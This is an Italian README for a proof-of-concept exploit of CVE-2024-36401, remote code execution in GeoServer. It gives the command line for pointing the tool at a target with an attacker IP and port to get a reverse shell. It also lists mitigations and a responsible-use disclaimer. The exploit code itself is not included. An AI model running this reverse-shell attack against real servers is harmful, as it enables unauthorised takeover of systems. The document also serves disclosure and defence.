
POC per CVE-2024-36401. Questo POC tenterà di stabilire una reverse shell dai target vulnerabili.
POC per CVE-2024-36401 GeoServer. Questo POC tenterà di stabilire una shell inversa di sistema dai target.

POC per CVE-2024-36401: RCE per GeoServer versioni precedenti alla 2.25.1, 2.24.3 e 2.23.5 di GeoServer. Questo POC si basa sull'avviso di sicurezza di phith0n.
Questo POC tenterà di stabilire una shell inversa dai target vulnerabili. È pensato per funzionare contro target Linux vulnerabili. Dovrai avere una macchina con un IP pubblico e accessibile per eseguire questo POC.
requestsPer usare questo POC contro un singolo target:
python CVE-2024-36401.py -u HTTP://TARGET:9090 -ip YOUR-IP -port LOCAL-PORT-NUMBER -type GeoServer-Object-Type
Aiuto:
python3 CVE-2024-36401.py -h
options:
-h, --help show this help message and exit
-u U Target, example https://target:8080
-ip IP Your IP, example 192.168.1.1
-port PORT Port, example 1337
-type TYPE Type, example sf:archsites
1- Disabilita le richieste WFS.
2- Metti in sicurezza il tuo Linux configurando iptables per disabilitare le connessioni inverse, imposta le policy predefinite per scartare tutto il traffico, consenti le connessioni stabilite e correlate e permetti solo il traffico in uscita essenziale come DNS, HTTP e HTTPS.
3- Oppure aggiorna all'ultima versione di GeoServer.
Per qualsiasi suggerimento o pensiero, contattami qui.
Mi piace creare i miei strumenti per divertimento, lavoro e soli scopi educativi. Non supporto né incoraggio l'hacking o l'accesso non autorizzato a qualsiasi sistema o rete. Per favore, usa i miei strumenti in modo responsabile e solo su sistemi su cui hai il permesso esplicito di testare.